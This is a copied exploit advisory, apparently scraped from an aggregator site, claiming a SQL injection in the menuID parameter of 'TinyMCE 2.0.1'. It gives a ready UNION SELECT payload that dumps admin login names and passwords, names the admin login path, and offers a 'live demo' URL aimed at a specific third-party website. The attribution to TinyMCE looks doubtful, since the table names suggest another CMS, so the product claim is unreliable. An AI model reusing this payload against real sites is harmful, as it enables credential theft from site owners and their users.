TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability

Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009020116

Below is a copy:

************************************************************
**  TinyMCE Remote SQL Injection
************************************************************
**  Prodcut:TinyMCE  Version 2.0.1
**  Home   : http://tinymce.moxiecode.com
**  Vunlerability :2/ SQL Injection
**  Risk  :high !!
**  Dork : N/A
************************************************************
** Discovred by:AnGeL25dZ
** From       :Constantine - Algeria
** Contact     : [email protected]
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeamhttp://www.hackteach.org/
**  Ra3ch, His0k4
************************************************************
**  Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.